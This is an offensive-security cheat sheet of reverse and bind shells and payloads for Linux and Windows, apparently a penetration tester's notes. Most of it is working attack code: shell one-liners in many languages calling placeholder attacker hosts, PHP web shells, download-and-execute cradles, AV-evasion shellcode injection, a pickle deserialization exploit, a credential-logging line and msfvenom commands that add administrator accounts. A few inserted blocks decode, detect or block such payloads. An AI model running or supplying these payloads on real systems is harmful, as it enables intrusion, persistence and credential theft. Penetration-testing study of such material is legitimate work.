# Shells / Payloads

## 01. Linux

* Common shells

```bash
## ------------------| Reverse
bash -i >& /dev/tcp/<HostIP>/4545 0>&1
bash -c "bash -i >& /dev/tcp/<HostIP>/4545 0>&1"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HostIP> 4545 >/tmp/f

## ------------------| Bind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 4545 >/tmp/f
```

* TTY Spawn shell

```bash
/bin/sh -i
## from a lua interpreter:
os.execute('/bin/sh')
echo os.system('/bin/bash')
script -qc /bin/bash /dev/null
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"
```

* Upgrade a freshly spawned shell to a fully interactive TTY

```bash
python -c "import pty; pty.spawn('/bin/bash')"
## Press Ctrl+Z to background the shell, then on the attacker terminal:
stty raw -echo; fg
stty rows 45 cols 173
export TERM=xterm-256color

## ------------------| To add colors
export LS_OPTIONS='--color=auto'
eval "`dircolors`"
alias ls='ls $LS_OPTIONS'
export PS1='\[\e]0;\u@\h: \w\a\]\[\033[01;32m\]\u@\h\[\033[01;34m\] \w\$\[\033[00m\] '

## ------------------| To find my rows and cols
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
```

* [ReverseSSH](https://github.com/Fahrj/reverse-ssh) \[Linux]🔥

```bash
## ------------------| Victim
## [32bit] wget https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx86 -O reverse-ssh
## [64bit] wget https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx64 -O reverse-ssh
chmod +x reverse-ssh
./reverse-ssh
./reverse-ssh -p <LPORT> <LHOST>
./reverse-ssh -p 22 h4rithd@<LHOST>

## ------------------| Attacker (user:letmeinbrudipls)
ssh -p 31337 <RHOST>
```

* Reverse shell
  * [Pentestmonkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
  * [revshells](https://www.revshells.com)

## 02. Windows

* One-liner reverse shell

```bash
## ------------------| Reverse
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('<HostIP>',4545);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()"

## ------------------| Bind
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4545);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"    
```

* From bind shell to reverse shell \[ Windows ]

```bash
## ------------------| Good locations to drop the binary
%temp%\shell.exe
C:\Users\Public\Documents\shell.exe

## ------------------| First try uploading nc.exe and getting a reverse shell; it is the easiest route
IWR -uri http://<IP>/nc64.exe -OutFile C:\Users\Public\Documents\nc.exe
cmd /c nc.exe <IP> 4545 -e powershell.exe

## ------------------| Nishang's PowerShell ReverseTCP
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
echo -e "Invoke-PowerShellTcp -Reverse -IPAddress <HostIP> -Port 4545" >> rev.ps1
python3 -m http.server 80
## Execute [x86/x64]
powershell "IEX(New-Object Net.WebClient).downloadString('http://<HostIP>/rev.ps1')"
## Execute [x64]
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<HostIP>/rev.ps1')"

## ------------------| If the above 👆 commands do not work, check whether PowerShell is restricted with the following command.
powershell $ExecutionContext.SessionState.LanguageMode
## If it returns ConstrainedLanguage, commands like IEX are blocked, so Invoke-PowerShellTcp.ps1 cannot run.
## Use netcat or 10x10x14x38_4545.exe fetched with Invoke-WebRequest (or any other download method) instead.
```

* Encoded Payload

```bash
## ------------------| Encode the payload 
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0   

## ------------------| Run the payload
powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==
powershell -E SQBFAFgAKABOA.....ApAA==
powershell -enc SQBFAFgAKABOA.....ApAA==
powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAKABOA.....ApAA==
```
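A defender's counterpart to the encoding step above, added here as an example (not code from the original page): it reverses the `iconv`/`base64` pipeline on a captured process command line and flags loader keywords in the plaintext. Function names, marker list and the sample command lines are constructed; the third sample is intentionally unencoded.

```python
import base64

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENCODED_FLAG = "-encodedcommand"

# Loader keywords worth a closer look when they appear in a decoded command; drawn from
# the download-cradle and TCP client/listener one-liners on this page (constructed list).
SUSPICIOUS_MARKERS = (
    "iex", "invoke-expression", "downloadstring", "net.webclient",
    "invoke-webrequest", "tcpclient", "tcplistener", "frombase64string",
)


def encode_command(command: str) -> str:
    """Same transform as `iconv --to-code UTF-16LE | base64 -w 0`: UTF-16LE text, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def _is_encoded_flag(token: str) -> bool:
    """True for -E, -enc, -EncodedCommand, ... (case-insensitive prefix), never for -Exec or -Command."""
    t = token.lower()
    return len(t) >= 2 and _ENCODED_FLAG.startswith(t)


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind an -EncodedCommand argument in a process command line.
    Returns None when no such flag is present or the blob is not valid base64 / UTF-16LE."""
    tokens = cmdline.split()          # base64 never contains whitespace, so a plain split is enough
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def flag_markers(command: str):
    """Markers from SUSPICIOUS_MARKERS present in a decoded command (case-insensitive)."""
    low = command.lower()
    return [m for m in SUSPICIOUS_MARKERS if m in low]


def triage(cmdline: str) -> dict:
    """Decode one command line and summarise what a reviewer should look at."""
    decoded = decode_encoded_command(cmdline)
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "markers": flag_markers(decoded) if decoded else [],
    }


# Constructed samples: the page's download cradle encoded exactly as the iconv/base64 step
# produces it, a benign encoded command, and a plain (unencoded) invocation.
CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
SAMPLE_CMDLINES = [
    "powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + encode_command(CRADLE),
    "powershell -enc " + encode_command("Get-Service -Name Spooler"),
    "powershell -NoP -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(line[:60] + "...")
        print("   decoded:", result["decoded"], "| markers:", result["markers"])
```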

* C program

```c
#include <stdlib.h>

int main ()
{
    int user;
    user = system ("powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAKABOA.....ApAA==");           
    //user = system ("net user h4rithd Password! /add");
    //user = system ("net localgroup administrators h4rithd /add");
    return 0;
}

// i686-w64-mingw32-gcc shell.c -o shell.exe
// x86_64-w64-mingw32-gcc shell.c -o shell64.exe
```

* Fully Interactive Reverse Shell for Windows \[[source](https://github.com/antonioCoco/ConPtyShell)]

```bash
## Only for Windows version >= 10 / 2019 1809 (build >= 10.0.17763)
## ------------------| Setup
stty size
wget https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -O rev.ps1
echo -e "\nInvoke-ConPtyShell -RemoteIp <IP> -RemotePort 4545 -Rows 45 -Cols 173" >> rev.ps1
IEX(New-Object Net.WebClient).downloadString('http://<HostIP>/rev.ps1')

## ------------------| Execute
nc -lvnp 4545
## Wait for the connection, then press Ctrl+Z to background it and run:
stty raw -echo; fg    ## press Enter once more after fg
```

* Simple Reverse Shell (avoids Windows 11 Defender detection) \[[source](https://github.com/h4rithd/Simple-Reverse-Shell)]

```bash
## ------------------| Setup
wget https://github.com/h4rithd/Simple-Reverse-Shell/releases/download/v1.0.0/RevShellx64.exe
mv RevShellx64.exe 10x10x14x38_4545.exe

## ------------------| Execute
powershell.exe Invoke-WebRequest -Uri http://10.10.14.38/10x10x14x38_4545.exe -OutFile C:\Windows\Temp\10x10x14x38_4545.exe
C:\Windows\Temp\10x10x14x38_4545.exe
```

* [`PowerCat`](https://github.com/besimorhino/powercat/blob/master/powercat.ps1) Usage

```bash
## ------------------| RevShell
powercat -c <HostIP> -p 4545 -e cmd.exe

## ------------------| BindShell
powercat -l -p 4545 -e cmd.exe

## ------------------| Create Simple Payload
powercat -c <HostIP> -p 4545 -e cmd.exe -g > revshell.ps1

## ------------------| Create Encoded Payload
powercat -c <HostIP> -p 4545 -e cmd.exe -ge > revshell.ps1
```

* PHP file upload and execute

```php
<?php
    if (isset($_REQUEST['fupload'])){
        file_put_contents($_REQUEST['fupload'], file_get_contents("http://<HostIP>/" . $_REQUEST['fupload']));
    }
    if (isset($_REQUEST['cmd'])){
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
?>
```

* If you cannot access cmd

```bash
## ------------------| Create payload
#include <stdlib.h>
int main() {
   system("C:\\Windows\\System32\\cmd.exe");
}

## ------------------| Compile to exe
x86_64-w64-mingw32-gcc pwn.c -o pwn.exe

## ------------------| Start smb server
impacket-smbserver -smb2support share $(pwd)
```

* AV Evasion (`ps1`)

```bash
## ------------------| Create shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=4545 -f powershell      

## ------------------| RevShell.ps1
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]]$sc = 0xfc,0x.....0xff,0xd5;

$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

## ------------------| Handler
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4545; set AutoRunScript post/windows/manage/migrate; exploit"   
```

* Simple Reverse ICMP Shell \[[icmpsh](https://github.com/bdamele/icmpsh)]

```bash
## ------------------| Disable ICMP replies by the OS [Execute on linux machine]
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
cat /proc/sys/net/ipv4/icmp_echo_ignore_all

## ------------------| Setup listener
sudo -s
wget https://raw.githubusercontent.com/bdamele/icmpsh/master/icmpsh_m.py
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
python icmpsh_m.py <MyLocalIP> <VictimIP>

## ------------------| Setup Reverse shell
cp /usr/share/nishang/Shells/Invoke-PowerShellIcmp.ps1 rev.ps1
## Optionally strip blank lines and comments, then append the following line at the end:
Invoke-PowerShellIcmp -IPAddress <MyLocalIP>

## ------------------| If you need to encode it and run
cat rev.ps1 | iconv -t utf-16le | base64 -w 0
powershell -enc <EncodeShell>

## ------------------| Enable ICMP replies by the OS [Execute on linux machine]
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0
cat /proc/sys/net/ipv4/icmp_echo_ignore_all
```

* [ReverseSSH](https://github.com/Fahrj/reverse-ssh) \[Windows]🔥

```bash
## ------------------| Victim
## [32bit] wget https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx86.exe -O reverse-ssh.exe
## [64bit] wget https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx64.exe -O reverse-ssh.exe
./reverse-ssh.exe
./reverse-ssh.exe -p <LPORT> <LHOST>
./reverse-ssh.exe -p 22 h4rithd@<LHOST>

## ------------------| Attacker (user:letmeinbrudipls)
ssh -p 31337 <RHOST>
```

* JScript Dropper

```bash
## ------------------| Setup
wget --no-check-certificate https://github.com/tyranid/DotNetToJScript/releases/download/v1.0.4/release_v1.0.4.7z
7z x release_v1.0.4.7z
cd release_v1.0.4.7z
### Create DLL Payload file
.\DotNetToJScript.exe Payload.dll -l [JScript,VBA,VBScript] -v [None,v2,v4,Auto] -o output.js
.\DotNetToJScript.exe Payload.dll -l JScript -v v4 -o output.js

## ------------------| Execute
Cscript.exe output.js
Wscript.exe output.js
```

{% hint style="info" %}
If everything else fails, compile this [shit](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs) and run it, or check this [blog](https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html).
{% endhint %}

## 03. Reverse Shells

* Bash

```bash
bash -i >& /dev/tcp/<HostIP>/4545 0>&1
bash -c "bash -i >& /dev/tcp/<HostIP>/4545 0>&1"

## ------------------| If your shell dies often, use nohup
bash -c 'nohup bash -i >& /dev/tcp/<HostIP>/4545 0>&1 &'
```

* Netcat

```bash
## ------------------| Reverse
nc -e /bin/sh <HostIP> 4545
nc -c bash <HostIP> 4545

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HostIP> 4545 >/tmp/f

## ------------------| Bind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 4545 >/tmp/f
```

* PHP

```bash
## ------------------| Extensions
.php , .php5 , .php7 , .phar

## ------------------| Check disable_functions
<?php phpinfo() ?>
####  system(), passthru(), shell_exec(), popen(), fsockopen() or proc_open()

## ------------------| 15 bytes shell (shell.php?1=id)
<?=`$_GET[1]`?>

## ------------------| Bind shell for test
<?php system($_REQUEST['cmd']); ?>
<?php echo shell_exec($_REQUEST['cmd']); ?>
<?php echo '<pre>'.shell_exec($_REQUEST['cmd']).'</pre>'; ?>
<?php passthru($_GET['cmd']); ?>
<?php echo exec("whoami");?>
<?php exec("ls -la",$array); print_r($array); ?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>   ## the /e modifier was removed in PHP 7
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo `whoami`; ?>
<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
<?php system($_SERVER['HTTP_USER_AGENT'])?>
<?php echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>

## ------------------| Secure bind shell (REMOTE_ADDR carries the client IP; REMOTE_HOST is only populated when hostname lookups are enabled)
<?php
    if ($_SERVER['REMOTE_ADDR'] === "<IP>") { // Set your IP address here
        if(isset($_REQUEST['cmd'])){
            $cmd = ($_REQUEST['cmd']);
            echo "<pre>\n";
            system($cmd);
            echo "</pre>";
        }
    }
?>

## ------------------| Rev shell
php -r '$sock=fsockopen("<HostIP>",4545);exec("/bin/sh -i <&3 >&3 2>&3");'

## ------------------| Include
<?php include("http://<HostIP>/rev.php"); ?>

## ------------------| Download file
<?php exec("wget -O /var/www/html/shell.php <HostIP>/rev.php"); ?>

## ------------------| Read an existing file
<?php echo file_get_contents("/etc/passwd"); ?>

## ------------------| Append to a file (LOCK_EX prevents anyone else writing to the file at the same time)
<?php file_put_contents('/dev/shm/logs.txt', "Login Found: ".$_POST['log'].":".$_POST['pwd']."\n" , FILE_APPEND | LOCK_EX); ?>

## ------------------| Weevely
## https://github.com/epinna/weevely3
weevely generate h4rithd shell.php
weevely http://<IP>/shell.php h4rithd
:audit_etcpasswd --help

## ------------------| proc_open [PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8]
<?php
$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    fwrite($pipes[0], 'ping -c 2 <IP>');
    fclose($pipes[0]);
    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>
```

* Python

```bash
## ------------------| One line
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<HostIP>",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

## ------------------| python script
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<HostIP>',4545))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])

## ------------------| python script without os
import socket,subprocess
from os import dup2
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<HostIP>',4545))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])

## ------------------| Privilege Escalate with dash
import os
os.system('chmod 4755 $(which dash)')
os.system('cp $(which dash) /tmp/dash;chmod 4555 /tmp/dash')

## ------------------| Bind
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",4545));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```
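Detection counterpart for the Bash, Netcat and Python one-liners in this section, added as an example (not code from the original page): a small rule set matched per recorded command line (bash history, auditd EXECVE, EDR process-creation event). Rule names and the sample log are constructed; `pty.spawn` is included because it also appears in the TTY-upgrade steps above, so expect to tune it for your environment.

```python
import re

# One rule per reverse/bind-shell idiom shown in this section. Each regex is applied to a
# single command line, so the multi-line Python script variant is out of scope here.
RULES = [
    ("bash-dev-tcp",   re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    ("mkfifo-nc-pipe", re.compile(r"mkfifo\s+\S+.*\|\s*(?:nc|ncat|netcat)\b")),
    ("nc-exec-shell",  re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-z]*[ec]\s+\S*(?:sh|bash|cmd|powershell)\b")),
    ("python-dup2",    re.compile(r"dup2\(.*(?:/bin/sh|/bin/bash)")),
    ("pty-spawn",      re.compile(r"pty\.spawn\(")),
]


def scan_line(line: str):
    """Names of the rules that match one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(line)]


def scan(lines):
    """Hits over a batch of command lines as (line_number, rule_names, line); clean lines are omitted."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = scan_line(line)
        if names:
            hits.append((n, names, line))
    return hits


# Constructed sample log: five idioms from this page mixed with routine admin commands
# (a port check and a log tail) that must not be flagged.
SAMPLE_LOG = [
    "bash -i >& /dev/tcp/10.0.0.5/4545 0>&1",
    "nc -zv db.internal 5432",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4545 >/tmp/f",
    "tail -f /var/log/syslog",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.0.0.5\",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); "
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "nc -e /bin/sh 10.0.0.5 4545",
]

if __name__ == "__main__":
    for n, names, line in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}\n    {line[:90]}")
```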

* Jsp

```jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```

* Asp

```asp
<% eval request("cmd") %>
```

* Perl

```bash
## ------------------| Linux
perl -e 'use Socket;$i="<HostIP>";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<HostIP>:4545");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

## ------------------| Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"<HostIP>:4545");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

* Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("<HostIP>",4545).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

* Java

```java
## ------------------| Linux
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<HostIP>/4545;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

## ------------------| Windows
### h4rithd.java
### run java h4rithd.java to obtain shell
import java.net.Socket;
import java.io.InputStream;
import java.io.IOException;
import java.io.OutputStream;

class h4rithd {
    public static void main(String[] args) throws Exception{
        String host="<IP>";
        int port=4545;
        String cmd="cmd.exe"; // Change this to [/bin/bash] according to the OS
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    }
}
```

* Groovy

```groovy
## ------------------| Execute command
cmd = "whoami"
println cmd.execute().text

## ------------------| RevShell
Thread.start {
    String host="<HostIP>";
    int port=4545;
    String cmd="bash"; //use cmd.exe for windows 
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}
```

* Pickle

```python
import os
import pickle
from base64 import urlsafe_b64encode as b64encode

payload = """
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HostIP> 4545 >/tmp/f
"""

class Expo(object):
    # Unpickling resolves os.system by name and calls it with payload
    def __reduce__(self):
        return (os.system, (payload,))

print(b64encode(pickle.dumps(Expo())).decode())

## Run : python3 exploit.py
```
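The mitigation side of the `__reduce__` gadget above, added as an example (not code from the original page): a restricted `Unpickler` whose `find_class()` only resolves an allow-list, so a pickle naming `os.system` is refused before any callable exists to invoke. The gadget used here substitutes the harmless builtin `sorted()` for `os.system` so the demonstration is side-effect free; the allow-list and sample data are constructed.

```python
import io
import pickle
from collections import OrderedDict

# Globals the application legitimately needs in its pickles (constructed allow-list).
# Anything else, os.system included, is refused before it is ever resolved.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose find_class() only resolves allow-listed (module, name) pairs.
    find_class is the hook every GLOBAL / STACK_GLOBAL opcode passes through, so a
    __reduce__ gadget that names os.system never receives a callable to invoke."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Drop-in for pickle.loads() that applies the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class ReduceGadget:
    """Same shape as the page's Expo class, but the callable is the harmless builtin
    sorted() so the demonstration runs without side effects."""

    def __reduce__(self):
        return (sorted, ("cba",))


def demo() -> dict:
    """Contrast plain pickle.loads() with safe_loads() on the gadget and on benign data."""
    gadget = pickle.dumps(ReduceGadget())
    benign = pickle.dumps(OrderedDict(user="svc", roles={"read", "write"}))

    unrestricted = pickle.loads(gadget)          # the named callable runs: ['a', 'b', 'c']
    try:
        safe_loads(gadget)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True                           # refused at find_class('builtins', 'sorted')

    return {
        "unrestricted": unrestricted,
        "restricted_blocked": blocked,
        "benign_roundtrip": safe_loads(benign) == pickle.loads(benign),
    }


if __name__ == "__main__":
    print(demo())
```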

* HTA

```html
<html><head><script>
    var c= 'cmd.exe'
    new ActiveXObject('WScript.Shell').Run(c);
</script></head><body><script>
    self.close();
</script></body></html>
```

* Javascript

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn((process.platform.includes('win')?'cmd.exe':'/bin/sh'),[]);
    var client = new net.Socket();
    client.connect(8080, "127.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the node.js application from crashing
})();
```

* NodeJS

```bash
echo "require('child_process').exec('ping -c 2 <IP>')" > /var/tmp/shell.js 
node /var/tmp/shell.js
```

* Telnet

```bash
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

* .so dynamic libraries

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   // setresuid

static void smash() __attribute__((constructor));

void smash() {
    setresuid(0,0,0);
    system("ping -c 2 192.168.119.121");
}
//gcc -o shell.so -shared shell.c -fPIC
```

## 04. MSFVenom

* General usage

```bash
msfvenom -l payloads | grep powershell    ## List payloads
msfvenom -l encoders                      ## List encoders
msfvenom --help-formats                   ## List payload formats

-b "\x00\x0a\x0d"                ## Bad characters to avoid
-f c                             ## Output format: C code
-e x86/shikata_ga_nai -i 5       ## Encoder and iteration count
EXITFUNC=thread

## ------------------| Migrate to a specified process
set AutoRunScript post/windows/manage/migrate

## ------------------| Deletes a specified user account
run post/windows/manage/delete_user USERNAME=h4rithd

## ------------------| Pivot deeper into a target network
run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD
use auxiliary/scanner/portscan/tcp 

shell_reverse_tcp    ## Stageless
shell/reverse_tcp    ## Staged (small size, 2 stages)

## ------------------| One line
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4545; set AutoRunScript post/windows/manage/migrate; exploit"
```

### 04.1 Windows

* Reverse Shell Executable (sh3ll.exe)

```bash
## ------------------| MSF Reverse Shell (Staged)
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<HostIP> LPORT=4545 -f exe > h4rithd.exe    

## ------------------| MSF Reverse Shell (Stageless)
msfvenom --platform windows -a x64 -p windows/x64/meterpreter_reverse_tcp LHOST=<HostIP> LPORT=4545 -f exe > h4rithd.exe    

## ------------------| MSF Reverse Shell (Encoded)
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 LHOST=<HostIP> LPORT=4545 -f exe > encoded.exe

## ------------------| CMD Reverse Shell
msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f exe > h4rithd.exe  

## ------------------| MSF Bind Shell 
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/bind_tcp RHOST=<HostIP> LPORT=4545 -f exe > h4rithd.exe  
```

* Create New User

```bash
## ------------------| Create User
msfvenom --platform windows -p windows/adduser USER=h4rithd PASS=Passw0rd@123 -f exe > h4rithd.exe
```

* Execute Commands

```bash
## ------------------| Execute Command 
msfvenom --platform windows -a x86 -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > h4rithd.exe     
msfvenom --platform windows -a x86 -p windows/exec CMD="net localgroup administrators h4rithd /add" -f exe > h4rithd.exe
```

* Other things

```bash
## ------------------| Run a program [mostly used for buffer overflows]
msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python

## ------------------| To create a 32-bit payload
-a x86 -p windows/meterpreter/reverse_tcp # MSF
-a x86 -p windows/shell_reverse_tcp       # CMD

## ------------------| Create DLL file
